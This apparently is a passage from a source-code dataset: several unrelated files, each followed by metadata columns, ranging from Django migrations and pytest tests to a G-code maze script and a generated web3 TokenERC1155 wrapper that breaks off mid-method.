assert input_properties['output1']['units'] == 'm'
properties = implicit.diagnostic_properties[
'output1_tendency_from_MockStepper']
assert properties['dims'] == ['dim1']
assert properties['units'] == 'm s^-1'
state = {
'time': timedelta(0),
'output1': DataArray(
np.ones([10])*10.,
dims=['dim1'],
attrs={'units': 'm'}
),
}
diagnostics, _ = implicit(state, timedelta(seconds=5))
assert 'output1_tendency_from_MockStepper' in diagnostics.keys()
assert len(
diagnostics['output1_tendency_from_MockStepper'].dims) == 1
assert 'dim1' in diagnostics['output1_tendency_from_MockStepper'].dims
assert diagnostics['output1_tendency_from_MockStepper'].attrs['units'] == 'm s^-1'
assert np.all(
diagnostics['output1_tendency_from_MockStepper'].values == 2.)
def test_tendencies_in_diagnostics_one_tendency_mismatched_units(self):
input_properties = {
'output1': {
'dims': ['dim1'],
'units': 'km'
}
}
diagnostic_properties = {}
output_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm'
}
}
diagnostic_output = {}
output_state = {
'output1': np.ones([10]) * 20.,
}
with self.assertRaises(InvalidPropertyDictError):
implicit = MockStepper(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, output_state, tendencies_in_diagnostics=True,
)
def test_tendencies_in_diagnostics_one_tendency_mismatched_dims(self):
input_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm'
}
}
diagnostic_properties = {}
output_properties = {
'output1': {
'dims': ['dim2'],
'units': 'm'
}
}
diagnostic_output = {}
output_state = {
'output1': np.ones([10]) * 20.,
}
with self.assertRaises(InvalidPropertyDictError):
implicit = MockStepper(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, output_state, tendencies_in_diagnostics=True,
)
def test_tendencies_in_diagnostics_one_tendency_with_component_name(self):
input_properties = {}
diagnostic_properties = {}
output_properties = {
'output1': {
'dims': ['dim1'],
'units': 'm'
}
}
diagnostic_output = {}
output_state = {
'output1': np.ones([10]) * 7.,
}
implicit = MockStepper(
input_properties, diagnostic_properties, output_properties,
diagnostic_output, output_state, tendencies_in_diagnostics=True,
name='component'
)
assert len(implicit.diagnostic_properties) == 1
assert 'output1_tendency_from_component' in implicit.diagnostic_properties.keys()
properties = implicit.diagnostic_properties[
'output1_tendency_from_component']
assert properties['dims'] == ['dim1']
assert properties['units'] == 'm s^-1'
state = {
'time': timedelta(0),
'output1': DataArray(
np.ones([10]) * 2.,
dims=['dim1'],
attrs={'units': 'm'}
),
}
diagnostics, _ = implicit(state, timedelta(seconds=5))
assert 'output1_tendency_from_component' in diagnostics.keys()
assert len(diagnostics['output1_tendency_from_component'].dims) == 1
assert 'dim1' in diagnostics['output1_tendency_from_component'].dims
assert diagnostics['output1_tendency_from_component'].attrs['units'] == 'm s^-1'
assert np.all(diagnostics['output1_tendency_from_component'].values == 1.)
if __name__ == '__main__':
pytest.main([__file__])
| 35.437953
| 105
| 0.57276
| 6,384
| 73,392
| 6.320175
| 0.033991
| 0.077327
| 0.08848
| 0.082408
| 0.906265
| 0.878581
| 0.855259
| 0.822668
| 0.806261
| 0.780906
| 0
| 0.016395
| 0.317691
| 73,392
| 2,070
| 106
| 35.455072
| 0.78934
| 0
| 0
| 0.73746
| 0
| 0
| 0.065743
| 0.010328
| 0
| 0
| 0
| 0
| 0.155816
| 1
| 0.081644
| false
| 0.019744
| 0.002668
| 0.009072
| 0.129136
| 0.000534
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
faedad2800d870e0d4fec1ef78ef72316567e49f
| 6,591
|
py
|
Python
|
mentoring/migrations/0001_initial.py
|
TomWerner/AlumniMentoring
|
d4bac09fc768232f0795a0672eb041a2225118ae
|
[
"MIT"
] | 2
|
2016-10-19T17:04:53.000Z
|
2017-07-23T21:49:34.000Z
|
mentoring/migrations/0001_initial.py
|
TomWerner/AlumniMentoring
|
d4bac09fc768232f0795a0672eb041a2225118ae
|
[
"MIT"
] | null | null | null |
mentoring/migrations/0001_initial.py
|
TomWerner/AlumniMentoring
|
d4bac09fc768232f0795a0672eb041a2225118ae
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-10-16 23:14
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Mentee',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.TextField(max_length=50)),
('last_name', models.TextField(max_length=50)),
('gender', models.TextField(choices=[('m', 'Male'), ('f', 'Female')], max_length=1)),
('active', models.BooleanField(default=True)),
],
),
migrations.CreateModel(
name='MenteeContactInformation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('primary_phone', models.CharField(max_length=20)),
('secondary_phone', models.CharField(max_length=20)),
('primary_email', models.EmailField(max_length=254)),
('secondary_email', models.EmailField(max_length=254)),
('linkedin_url', models.CharField(max_length=100)),
('facebook_url', models.CharField(max_length=100)),
('personal_url', models.CharField(max_length=100)),
('street_address', models.CharField(max_length=100)),
('city', models.CharField(max_length=100)),
('state', models.CharField(max_length=30)),
('mentee', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='mentoring.Mentee')),
],
),
migrations.CreateModel(
name='MenteeEducation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('school', models.CharField(max_length=100)),
('major1', models.CharField(max_length=100)),
('major2', models.CharField(blank=True, max_length=100, null=True)),
('minor1', models.CharField(blank=True, max_length=100, null=True)),
('minor2', models.CharField(blank=True, max_length=100, null=True)),
('degree', models.CharField(choices=[('ba', 'Bachelor of Arts'), ('bs', 'Bachelor of Sciences'), ('m', 'Masters'), ('d', 'Ph.D'), ('pd', 'MD Ph.D'), ('md', 'MD')], max_length=3)),
('graduation_year', models.DateField()),
],
),
migrations.CreateModel(
name='Mentor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=50)),
('last_name', models.CharField(max_length=50)),
('gender', models.CharField(choices=[('m', 'Male'), ('f', 'Female')], max_length=1)),
('active', models.BooleanField(default=True)),
],
),
migrations.CreateModel(
name='MentorContactInformation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('primary_phone', models.CharField(max_length=20)),
('secondary_phone', models.CharField(max_length=20)),
('primary_email', models.EmailField(max_length=254)),
('secondary_email', models.EmailField(max_length=254)),
('linkedin_url', models.CharField(max_length=100)),
('facebook_url', models.CharField(max_length=100)),
('personal_url', models.CharField(max_length=100)),
('street_address', models.TextField(max_length=100)),
('city', models.TextField(max_length=100)),
('state', models.TextField(max_length=30)),
('mentor', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='mentoring.Mentor')),
],
),
migrations.CreateModel(
name='MentorEducation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('school', models.CharField(max_length=100)),
('major1', models.CharField(max_length=100)),
('major2', models.CharField(blank=True, max_length=100, null=True)),
('minor1', models.CharField(blank=True, max_length=100, null=True)),
('minor2', models.CharField(blank=True, max_length=100, null=True)),
('degree', models.CharField(choices=[('ba', 'Bachelor of Arts'), ('bs', 'Bachelor of Sciences'), ('m', 'Masters'), ('d', 'Ph.D'), ('pd', 'MD Ph.D'), ('md', 'MD')], max_length=3)),
('graduation_year', models.DateField()),
('mentor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mentoring.Mentor')),
],
),
migrations.CreateModel(
name='MentorEmployment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('company', models.CharField(max_length=100)),
('title', models.CharField(max_length=100)),
('description', models.TextField()),
('mentor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mentoring.Mentor')),
],
),
migrations.CreateModel(
name='MentorMenteePairs',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start_date', models.DateField()),
('end_date', models.DateField(null=True)),
('comments', models.TextField()),
('mentee', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mentoring.Mentee')),
('mentor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mentoring.Mentor')),
],
),
migrations.AddField(
model_name='menteeeducation',
name='mentor',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mentoring.Mentor'),
),
]
| 52.728
| 195
| 0.570475
| 656
| 6,591
| 5.577744
| 0.182927
| 0.098388
| 0.072151
| 0.137743
| 0.825635
| 0.769882
| 0.740366
| 0.740366
| 0.740366
| 0.740366
| 0
| 0.025966
| 0.26961
| 6,591
| 124
| 196
| 53.153226
| 0.734109
| 0.009862
| 0
| 0.637931
| 1
| 0
| 0.141499
| 0.007359
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.025862
| 0
| 0.060345
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
87bdfe99811f7b922cbd2e9331deb56c2b325dc5
| 1,276
|
py
|
Python
|
batcher_sanity_check.py
|
JRC1995/SocialMediaNER
|
236b22ded48f64516ebf0577c3b9d9d907db84e0
|
[
"MIT"
] | null | null | null |
batcher_sanity_check.py
|
JRC1995/SocialMediaNER
|
236b22ded48f64516ebf0577c3b9d9d907db84e0
|
[
"MIT"
] | null | null | null |
batcher_sanity_check.py
|
JRC1995/SocialMediaNER
|
236b22ded48f64516ebf0577c3b9d9d907db84e0
|
[
"MIT"
] | null | null | null |
from dataLoader.batch import batcher
type1_samples = [[10, 11, 12], [10], [10, 11, 12, 13], [10, 11]]
type2_samples = [[20, 21, 22], [20], [20, 21, 22, 23], [20, 21]]
type3_samples = [3, 1, 4, 2]
sample_tuples = [type1_samples, type2_samples, type3_samples]
pad_types = [0, -1, None]
i = 0
for batch, batch_masks in batcher(sample_tuples, pad_types, batch_size=2):
type1_batch = batch[0]
type2_batch = batch[1]
type3_batch = batch[2]
type1_mask = batch_masks[0]
type2_mask = batch_masks[0]
print("type1", type1_batch)
print("type2", type2_batch)
print("type3", type3_batch)
i += 1
type1_samples = [[10, 11, 12], [10], [10, 11, 12, 13], [10, 11]]
type2_samples = [[20, 21, 22], [20], [20, 21, 22, 23], [20, 21]]
type3_samples = [3, 1, 4, 2]
sample_tuples = [type1_samples, type2_samples, type3_samples]
pad_types = [None, 0.89, 2] # Check robustness to invalid Pad values. Should RAISE errors
i = 0
for batch, batch_masks in batcher(sample_tuples, pad_types, batch_size=2):
type1_batch = batch[0]
type2_batch = batch[1]
type3_batch = batch[2]
type1_mask = batch_masks[0]
type2_mask = batch_masks[0]
print("type1", type1_batch)
print("type2", type2_batch)
print("type3", type3_batch)
i += 1
| 26.583333
| 90
| 0.65047
| 203
| 1,276
| 3.871921
| 0.211823
| 0.101781
| 0.030534
| 0.076336
| 0.877863
| 0.877863
| 0.877863
| 0.877863
| 0.877863
| 0.877863
| 0
| 0.140214
| 0.195141
| 1,276
| 47
| 91
| 27.148936
| 0.625122
| 0.046238
| 0
| 0.909091
| 0
| 0
| 0.024691
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.030303
| 0
| 0.030303
| 0.181818
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
87f7245e551cd089fc5f81791ae868716886c416
| 2,740
|
py
|
Python
|
Shape Paths/Maze.py
|
deltaGPhys/CNCCoffeeTable
|
412b1d788a86f78ba3ad57885143f8121508c1fb
|
[
"MIT"
] | null | null | null |
Shape Paths/Maze.py
|
deltaGPhys/CNCCoffeeTable
|
412b1d788a86f78ba3ad57885143f8121508c1fb
|
[
"MIT"
] | null | null | null |
Shape Paths/Maze.py
|
deltaGPhys/CNCCoffeeTable
|
412b1d788a86f78ba3ad57885143f8121508c1fb
|
[
"MIT"
] | null | null | null |
from __future__ import division
xmax = 635
ymax = 220
x = 8
y = 0
diff = 20
print "G21 (mm mode)"
print "G90 (absolute mode)"
print "F2000"
print "G1 X8"
print "G91 (relative mode)"
moves = [
[-3,0],
[0,2],
[-1,0],
[0,-2],
[-9,0],
[0,1],
[-1,0],
[0,-1],
[-5,0],
[0,1],
[-1,0],
[0,-1],
[-3,0],
[0,1],
[2,0],
[0,1],
[-4,0],
[0,2],
[1,0],
[0,-1],
[1,0],
[0,1],
[1,0],
[0,-1],
[2,0],
[0,-1],
[1,0],
[0,1],
[1,0],
[0,-2],
[1,0],
[0,3],
[-4,0],
[0,3],
[1,0],
[0,-2],
[1,0],
[0,4],
[3,0],
[0,-2],
[2,0],
[0,-2],
[3,0],
[0,-1],
[-4,0],
[0,2],
[-2,0],
[0,2],
[-1,0],
[0,-3],
[2,0],
[0,-4],
[1,0],
[0,2],
[1,0],
[0,-1],
[1,0],
[0,1],
[2,0],
[0,-1],
[-1,0],
[0,-1],
[7,0],
[0,3],
[-1,0],
[0,-2],
[-1,0],
[0,3],
[1,0],
[0,1],
[-2,0],
[0,1],
[3,0],
[0,-2],
[1,0],
[0,-2],
[1,0],
[0,1],
[2,0],
[0,1],
[-2,0],
[0,1],
[-1,0],
[0,2],
[-5,0],
[0,-3],
[1,0],
[0,-1],
[-1,0],
[0,-1],
[1,0],
[0,-1],
[-2,0],
[0,6],
[-2,0],
[0,-1],
[1,0],
[0,-1],
[-2,0],
[0,2],
[-2,0],
[0,1],
[1,0],
[0,1],
[-7,0],
[0,-1],
[1,0],
[0,-1],
[-5,0],
[0,2],
[-1,0],
[0,-3],
[-2,0],
[0,-1],
[3,0],
[0,1],
[3,0],
[0,-2],
[-1,0],
[0,1],
[-1,0],
[0,-1],
[-2,0],
[0,-4],
[2,0],
[0,-1],
[-3,0],
[0,1],
[-1,0],
[0,-1],
[-3,0],
[0,2],
[1,0],
[0,-1],
[1,0],
[0,1],
[2,0],
[0,1],
[-1,0],
[0,1],
[1,0],
[0,1],
[-2,0],
[0,1],
[-1,0],
[0,-2],
[1,0],
[0,-1],
[-2,0],
[0,5],
[1,0],
[0,-1],
[1,0],
[0,1],
[2,0],
[0,2],
[-1,0],
[0,-1],
[-1,0],
[0,1],
[-1,0],
[0,-1],
[-1,0],
[0,2],
[7,0],
[0,-2],
[2,0],
[0,1],
[-1,0],
[0,1],
[12,0],
[0,-1],
[-2,0],
[0,-1],
[3,0],
[0,2],
[1,0],
[0,-2],
[1,0],
[0,2],
[4,0],
[0,-1],
[-3,0],
[0,-1],
[4,0],
[0,2],
[1,0],
[0,-3],
[-1,0],
[0,-1],
[1,0],
[0,-1],
[1,0],
[0,5],
[1,0],
[0,-9],
[-1,0],
[0,1],
[-1,0],
[0,-2],
[2,0],
[0,-1],
]
#maze path
for move in moves:
print "G1 X"+str(-move[0]*diff)+"Y"+str(move[1]*diff)
#reverse it
newmoves = moves[::-1]
for move in newmoves:
print "G1 X"+str(move[0]*diff)+"Y"+str(-move[1]*diff)
| 11.659574
| 57
| 0.241971
| 475
| 2,740
| 1.387368
| 0.092632
| 0.306525
| 0.268589
| 0.206373
| 0.694992
| 0.694992
| 0.687405
| 0.660091
| 0.60698
| 0.60698
| 0
| 0.264473
| 0.401095
| 2,740
| 234
| 58
| 11.709402
| 0.137112
| 0.006934
| 0
| 0.890909
| 0
| 0
| 0.026161
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.004545
| null | null | 0.031818
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e210c89a14871ece813767a23287a9a824d75311
| 108
|
py
|
Python
|
check_auto_deploy/__init__.py
|
vfdev-5/tests_auto_deploy
|
4528f8838d9899c29655c7ad72ca5ba3b6ccc7bb
|
[
"BSD-3-Clause"
] | null | null | null |
check_auto_deploy/__init__.py
|
vfdev-5/tests_auto_deploy
|
4528f8838d9899c29655c7ad72ca5ba3b6ccc7bb
|
[
"BSD-3-Clause"
] | null | null | null |
check_auto_deploy/__init__.py
|
vfdev-5/tests_auto_deploy
|
4528f8838d9899c29655c7ad72ca5ba3b6ccc7bb
|
[
"BSD-3-Clause"
] | null | null | null |
from check_auto_deploy.foo import Foo
from check_auto_deploy.bar import Bar, Events
__version__ = '0.2.0'
| 18
| 45
| 0.796296
| 19
| 108
| 4.105263
| 0.578947
| 0.230769
| 0.333333
| 0.487179
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.031915
| 0.12963
| 108
| 5
| 46
| 21.6
| 0.797872
| 0
| 0
| 0
| 0
| 0
| 0.046296
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
355ce29ea0e6b550e20a753d803db203bda8791f
| 7,248
|
py
|
Python
|
tests/dao/test_update.py
|
mpsiva89/protean
|
315fa56da3f64178bbbf0edf1995af46d5eb3da7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/dao/test_update.py
|
mpsiva89/protean
|
315fa56da3f64178bbbf0edf1995af46d5eb3da7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/dao/test_update.py
|
mpsiva89/protean
|
315fa56da3f64178bbbf0edf1995af46d5eb3da7
|
[
"BSD-3-Clause"
] | null | null | null |
import pytest
from protean.exceptions import ObjectNotFoundError
from .elements import Person, PersonRepository, User
class TestDAOUpdateFunctionality:
@pytest.fixture(autouse=True)
def register_elements(self, test_domain):
test_domain.register(Person)
test_domain.register(PersonRepository, aggregate_cls=Person)
test_domain.register(User)
def test_update_an_existing_entity_in_the_repository(self, test_domain):
person = test_domain.repository_for(Person)._dao.create(
id=11344234, first_name="John", last_name="Doe", age=22
)
test_domain.repository_for(Person)._dao.update(person, age=10)
updated_person = test_domain.repository_for(Person)._dao.get(11344234)
assert updated_person is not None
assert updated_person.age == 10
def test_that_updating_a_deleted_aggregate_raises_object_not_found_error(
self, test_domain
):
"""Try to update a non-existing entry"""
person = test_domain.repository_for(Person)._dao.create(
id=11344234, first_name="Johnny", last_name="John"
)
test_domain.repository_for(Person)._dao.delete(person)
with pytest.raises(ObjectNotFoundError):
test_domain.repository_for(Person)._dao.update(person, {"age": 10})
def test_updating_record_with_dictionary_args(self, test_domain):
"""Update an existing entity in the repository"""
person = test_domain.repository_for(Person)._dao.create(
id=2, first_name="Johnny", last_name="John", age=2
)
test_domain.repository_for(Person)._dao.update(person, {"age": 10})
u_person = test_domain.repository_for(Person)._dao.get(2)
assert u_person is not None
assert u_person.age == 10
def test_updating_record_with_kwargs(self, test_domain):
"""Update an existing entity in the repository"""
person = test_domain.repository_for(Person)._dao.create(
id=2, first_name="Johnny", last_name="John", age=2
)
test_domain.repository_for(Person)._dao.update(person, age=10)
u_person = test_domain.repository_for(Person)._dao.get(2)
assert u_person is not None
assert u_person.age == 10
def test_updating_record_with_both_dictionary_args_and_kwargs(self, test_domain):
"""Update an existing entity in the repository"""
person = test_domain.repository_for(Person)._dao.create(
id=2, first_name="Johnny", last_name="John", age=2
)
test_domain.repository_for(Person)._dao.update(
person, {"first_name": "Stephen"}, age=10
)
u_person = test_domain.repository_for(Person)._dao.get(2)
assert u_person is not None
assert u_person.age == 10
assert u_person.first_name == "Stephen"
def test_updating_record_through_filter(self, test_domain):
"""Test that update by query updates only correct records"""
test_domain.repository_for(Person)._dao.create(
id=1, first_name="Athos", last_name="Musketeer", age=2
)
test_domain.repository_for(Person)._dao.create(
id=2, first_name="Porthos", last_name="Musketeer", age=3
)
test_domain.repository_for(Person)._dao.create(
id=3, first_name="Aramis", last_name="Musketeer", age=4
)
test_domain.repository_for(Person)._dao.create(
id=4, first_name="dArtagnan", last_name="Musketeer", age=5
)
# Perform update
updated_count = (
test_domain.repository_for(Person)
._dao.query.filter(age__gt=3)
.update(last_name="Fraud")
)
# Query and check if only the relevant records have been updated
assert updated_count == 2
u_person1 = test_domain.repository_for(Person)._dao.get(1)
u_person2 = test_domain.repository_for(Person)._dao.get(2)
u_person3 = test_domain.repository_for(Person)._dao.get(3)
u_person4 = test_domain.repository_for(Person)._dao.get(4)
assert u_person1.last_name == "Musketeer"
assert u_person2.last_name == "Musketeer"
assert u_person3.last_name == "Fraud"
assert u_person4.last_name == "Fraud"
def test_updating_multiple_records_through_filter_with_arg_value(self, test_domain):
"""Try updating all records satisfying filter in one step, passing a dict"""
test_domain.repository_for(Person)._dao.create(
id=1, first_name="Athos", last_name="Musketeer", age=2
)
test_domain.repository_for(Person)._dao.create(
id=2, first_name="Porthos", last_name="Musketeer", age=3
)
test_domain.repository_for(Person)._dao.create(
id=3, first_name="Aramis", last_name="Musketeer", age=4
)
test_domain.repository_for(Person)._dao.create(
id=4, first_name="dArtagnan", last_name="Musketeer", age=5
)
# Perform update
updated_count = (
test_domain.repository_for(Person)
._dao.query.filter(age__gt=3)
.update_all({"last_name": "Fraud"})
)
# Query and check if only the relevant records have been updated
assert updated_count == 2
u_person1 = test_domain.repository_for(Person)._dao.get(1)
u_person2 = test_domain.repository_for(Person)._dao.get(2)
u_person3 = test_domain.repository_for(Person)._dao.get(3)
u_person4 = test_domain.repository_for(Person)._dao.get(4)
assert u_person1.last_name == "Musketeer"
assert u_person2.last_name == "Musketeer"
assert u_person3.last_name == "Fraud"
assert u_person4.last_name == "Fraud"
def test_updating_multiple_records_through_filter_with_kwarg_value(
self, test_domain
):
"""Try updating all records satisfying filter in one step"""
test_domain.repository_for(Person)._dao.create(
id=1, first_name="Athos", last_name="Musketeer", age=2
)
test_domain.repository_for(Person)._dao.create(
id=2, first_name="Porthos", last_name="Musketeer", age=3
)
test_domain.repository_for(Person)._dao.create(
id=3, first_name="Aramis", last_name="Musketeer", age=4
)
test_domain.repository_for(Person)._dao.create(
id=4, first_name="dArtagnan", last_name="Musketeer", age=5
)
# Perform update
updated_count = (
test_domain.repository_for(Person)
._dao.query.filter(age__gt=3)
.update_all(last_name="Fraud")
)
# Query and check if only the relevant records have been updated
assert updated_count == 2
u_person1 = test_domain.repository_for(Person)._dao.get(1)
u_person2 = test_domain.repository_for(Person)._dao.get(2)
u_person3 = test_domain.repository_for(Person)._dao.get(3)
u_person4 = test_domain.repository_for(Person)._dao.get(4)
assert u_person1.last_name == "Musketeer"
assert u_person2.last_name == "Musketeer"
assert u_person3.last_name == "Fraud"
assert u_person4.last_name == "Fraud"
| 41.181818
| 88
| 0.660734
| 935
| 7,248
| 4.805348
| 0.119786
| 0.120187
| 0.186957
| 0.215001
| 0.84398
| 0.835299
| 0.824171
| 0.815936
| 0.801246
| 0.801246
| 0
| 0.021457
| 0.234823
| 7,248
| 175
| 89
| 41.417143
| 0.788677
| 0.080298
| 0
| 0.625
| 0
| 0
| 0.056453
| 0
| 0
| 0
| 0
| 0
| 0.176471
| 1
| 0.066176
| false
| 0
| 0.022059
| 0
| 0.095588
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
358d8ddc061acaa3a2db0ab4b120817a11d0c14e
| 179,699
|
py
|
Python
|
thirdweb/abi/token_erc1155.py
|
nftlabs/nftlabs-sdk-python
|
ea533142dc0881872b347cd8ce635dc0bfff3153
|
[
"Apache-2.0"
] | 30
|
2021-10-31T13:17:58.000Z
|
2022-02-04T13:41:13.000Z
|
thirdweb/abi/token_erc1155.py
|
nftlabs/nftlabs-sdk-python
|
ea533142dc0881872b347cd8ce635dc0bfff3153
|
[
"Apache-2.0"
] | 36
|
2021-11-03T20:30:38.000Z
|
2022-02-14T10:15:40.000Z
|
thirdweb/abi/token_erc1155.py
|
nftlabs/nftlabs-sdk-python
|
ea533142dc0881872b347cd8ce635dc0bfff3153
|
[
"Apache-2.0"
] | 10
|
2021-11-10T19:59:41.000Z
|
2022-01-21T21:26:55.000Z
|
"""Generated wrapper for TokenERC1155 Solidity contract."""
# pylint: disable=too-many-arguments
import json
from typing import ( # pylint: disable=unused-import
Any,
List,
Optional,
Tuple,
Union,
)
from eth_utils import to_checksum_address
from mypy_extensions import TypedDict # pylint: disable=unused-import
from hexbytes import HexBytes
from web3 import Web3
from web3.contract import ContractFunction
from web3.datastructures import AttributeDict
from web3.providers.base import BaseProvider
from zero_ex.contract_wrappers.bases import ContractMethod, Validator
from zero_ex.contract_wrappers.tx_params import TxParams
# Try to import a custom validator class definition; if there isn't one,
# declare one that we can instantiate for the default argument to the
# constructor for TokenERC1155 below.
try:
# both mypy and pylint complain about what we're doing here, but this
# works just fine, so their messages have been disabled here.
from . import ( # type: ignore # pylint: disable=import-self
TokenERC1155Validator,
)
except ImportError:
class TokenERC1155Validator(Validator): # type: ignore
"""No-op input validator."""
try:
from .middleware import MIDDLEWARE # type: ignore
except ImportError:
pass
class ITokenERC1155MintRequest(TypedDict):
"""Python representation of a tuple or struct.
Solidity compiler output does not include the names of structs that appear
in method definitions. A tuple found in an ABI may have been written in
Solidity as a literal, anonymous tuple, or it may have been written as a
named `struct`:code:, but there is no way to tell from the compiler
output. This class represents a tuple that appeared in a method
definition. Its name is derived from a hash of that tuple's field names,
and every method whose ABI refers to a tuple with that same list of field
names will have a generated wrapper method that refers to this class.
Any members of type `bytes`:code: should be encoded as UTF-8, which can be
accomplished via `str.encode("utf_8")`:code:
"""
to: str
royaltyRecipient: str
royaltyBps: int
primarySaleRecipient: str
tokenId: int
uri: str
quantity: int
pricePerToken: int
currency: str
validityStartTimestamp: int
validityEndTimestamp: int
uid: Union[bytes, str]
class DefaultAdminRoleMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the DEFAULT_ADMIN_ROLE method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return Union[bytes, str](returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class BalanceOfMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the balanceOf method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, account: str, _id: int):
"""Validate the inputs to the balanceOf method."""
self.validator.assert_valid(
method_name="balanceOf",
parameter_name="account",
argument_value=account,
)
account = self.validate_and_checksum_address(account)
self.validator.assert_valid(
method_name="balanceOf",
parameter_name="id",
argument_value=_id,
)
# safeguard against fractional inputs
_id = int(_id)
return (account, _id)
def call(
self, account: str, _id: int, tx_params: Optional[TxParams] = None
) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(account, _id) = self.validate_and_normalize_inputs(account, _id)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(account, _id).call(
tx_params.as_dict()
)
return int(returned)
def send_transaction(
self, account: str, _id: int, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(account, _id) = self.validate_and_normalize_inputs(account, _id)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, _id).transact(
tx_params.as_dict()
)
def build_transaction(
self, account: str, _id: int, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(account, _id) = self.validate_and_normalize_inputs(account, _id)
